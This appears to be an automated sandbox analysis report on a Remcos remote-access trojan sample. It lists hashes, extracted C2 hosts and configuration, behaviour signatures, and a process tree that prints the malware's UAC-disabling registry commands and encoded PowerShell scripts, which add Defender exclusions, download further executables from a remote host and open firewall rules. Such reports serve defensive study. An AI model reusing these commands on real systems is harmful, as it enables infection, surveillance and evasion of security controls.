Overview

overview

10

Static

static

10

23350a3353...53.exe

windows7-x64

10

23350a3353...53.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-11-2024 22:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    23350a33531966fa6a0cf02f9c27f053.exe

  • Size

    466KB

  • MD5

    23350a33531966fa6a0cf02f9c27f053

  • SHA1

    1f53024c59b6b65fcf032bd5bb69cedbdcc67dfa

  • SHA256

    0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d

  • SHA512

    b6f8bbbbc5bf9b4d982bdab369513b5667835aa6660678917c259b599d563c7ad2d8f5233e4c62d962523393d8faa51087e3696fa72cabbde81ec1a39d3adfac

  • SSDEEP

    12288:JuD09AUkNIGBYYv4eK13x13nZHSRVMf139F5wIB7+IwtHwBtVxbesvZDS57G+DY:809AfNIEYsunZvZ19ZiGs

Score
10/10
remcosr2411defense_evasiondiscoveryevasionexecutionimpactpersistenceransomwarerattrojan

Malware Config

Extracted

Family

remcos

Botnet

R2411

C2

cc.shinrarigs.com:2404

45.32.129.178:2404
Attributes
  • audio_folder

    MicRecords (em inglês)

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    5

  • copy_file

    BraveSharedUpdater.exe

  • copy_folder

    BraveShared

  • delete_file

    true

  • hide_file

    true

  • hide_keylog_file

    true

  • install_flag

    true

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    BravePrivate

  • mouse_option

    false

  • mutex

    Brv-Q0EV0O

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Capturas de tela

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Modifies Windows Defender notification settings 3 TTPs 4 IoCs
    evasiontrojan
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 4 IoCs
    evasiontrojan
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Adds policy Run key to start application 2 TTPs 6 IoCs
    persistence
  • Blocklisted process makes network request 1 IoCs
  • Disables Task Manager via registry modification
    evasion
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 38 IoCs
  • Adds Run key to start application 2 TTPs 16 IoCs
    persistence
  • Power Settings 1 TTPs 2 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\23350a33531966fa6a0cf02f9c27f053.exe
    "C:\Users\Admin\AppData\Local\Temp\23350a33531966fa6a0cf02f9c27f053.exe"
    1⤵
    • Adds policy Run key to start application
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:5112
    • C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4928
      • C:\Windows\SysWOW64\reg.exe
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2092
    • C:\ProgramData\BraveShared\BraveSharedUpdater.exe
      "C:\ProgramData\BraveShared\BraveSharedUpdater.exe"
      2⤵
      • Adds policy Run key to start application
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2472
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3660
      • \??\c:\program files (x86)\internet explorer\iexplore.exe
        "c:\program files (x86)\internet explorer\iexplore.exe"
        3⤵
        • Adds policy Run key to start application
        • Deletes itself
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4020
        • C:\Windows\SysWOW64\cmd.exe
          /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3732
          • C:\Windows\SysWOW64\reg.exe
            C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:4956
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3980
        • C:\ProgramData\BraveCrashHandler.exe
          "C:\ProgramData\BraveCrashHandler.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4804
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4GPREUL2.bat" "C:\ProgramData\BraveCrashHandler.exe" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4944
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGkAZgAoAC0ATgBvAHQAIAAkACgAJAAoAHcAaABvAGEAbQBpACkAIAAtAGUAcQAgACIAbgB0ACAAYQB1AHQAaABvAHIAaQB0AHkAXABzAHkAcwB0AGUAbQAiACkAKQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAZgBhAGwAcwBlAAoACgAgACAAIAAgAGkAZgAgACgALQBOAG8AdAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQAgAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMACgAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBWAGUAcgBiACAAUgB1AG4AYQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlAAoAIAAgACAAIAAgACAAIAAgAEUAeABpAHQACgAgACAAIAAgAH0ACgAKACAAIAAgACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAA9ACAAJAAoAEcAZQB0AC0AQwBvAG0AbQBhAG4AZAAgAFAAcwBFAHgAZQBjACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIAAnAGkAZwBuAG8AcgBlACcAKQAuAFMAbwB1AHIAYwBlACAACgAgACAAIAAgAGkAZgAoACQAcABzAGUAeABlAGMAXwBwAGEAdABoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIAIAAtAGkAIAAtAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIABgACIAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4ATQB5AEMAbwBtAG0AYQBuAGQALgBQAGEAdABoACAAKwAgACIAYAAiACAAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4AVQBuAGIAbwB1AG4AZABBAHIAZwB1AG0AZQBuAHQAcwAgAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABlAHgAaQB0AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgAH0ACgAKAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAJABJAHMAUwB5AHMAdABlAG0AIAA9ACAAJAB0AHIAdQBlAAoAfQAKAAoANgA3AC4ALgA5ADAAfABmAG8AcgBlAGEAYwBoAC0AbwBiAGoAZQBjAHQAewAKACAAIAAgACAAJABkAHIAaQB2AGUAIAA9ACAAWwBjAGgAYQByAF0AJABfAAoAIAAgACAAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgAkACgAJABkAHIAaQB2AGUAKQA6AFwAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACoAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKAH0ACgA=
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1792
              • C:\Windows\system32\chcp.com
                "C:\Windows\system32\chcp.com" 65001
                7⤵
                  PID:4136
                • C:\Windows\system32\whoami.exe
                  "C:\Windows\system32\whoami.exe"
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4192
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAZgBpAGwAZQBzAFQAbwBDAGgAZQBjAGsAIAA9ACAAQAAoAAoAIAAgACAAIABAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiADsAIABVAHIAbAA9ACIAaAB0AHQAcABzADoALwAvAHMAagBjADEALgB2AHUAbAB0AHIAbwBiAGoAZQBjAHQAcwAuAGMAbwBtAC8AYwBmAGMAYgA2ADkAZgBmAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoACQBAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgB9AAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlACAAaQBuACAAJABmAGkAbABlAHMAVABvAEMAaABlAGMAawApACAAewAKACAAIAAgACAAaQBmACAAKAAtAE4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQAuAFAAYQB0AGgAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQApACAAewAKACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAGYAaQBsAGUALgBVAHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgBpAGwAZQAuAFAAYQB0AGgACgAgACAAIAAgAH0ACgAgACAAIAAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZgBpAGwAZQAuAFAAYQB0AGgAKQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAfQAKAAoAJABhAGQAZABpAHQAaQBvAG4AYQBsAEYAaQBsAGUAcwBUAG8ASABpAGQAZQAgAD0AIABAACgACgAJACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAbQB5AHMAdAAtAGwAYQB1AG4AYwBoAGUAcgAtAGEAbQBkADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGYAaQBsAGUAUABhAHQAaAAgAGkAbgAgACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAGkAbABlAHMAVABvAEgAaQBkAGUAKQAgAHsACgAgACAAIAAgAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAUABhAHQAaAAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgAKACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAG8AbABkAGUAcgBzAFQAbwBIAGkAZABlACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAFAAcgBpAHYAYQB0AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AYgBpAG4AIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AbgBvAGQAZQAiAAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlAFAAYQB0AGgAIABpAG4AIAAkAGEAZABkAGkAdABpAG8AbgBhAGwARgBvAGwAZABlAHIAcwBUAG8ASABpAGQAZQApACAAewAKACAAIAAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBQAGEAdABoACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgA=
                6⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3976
                • C:\Windows\system32\chcp.com
                  "C:\Windows\system32\chcp.com" 65001
                  7⤵
                    PID:2964
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAiACAALQBHAHIAbwB1AHAAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAEUAVQBMAEEAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIABFAFUATABBACIAIAAtAEcAcgBvAHUAcAAgACIATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACAARQBVAEwAQQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAgA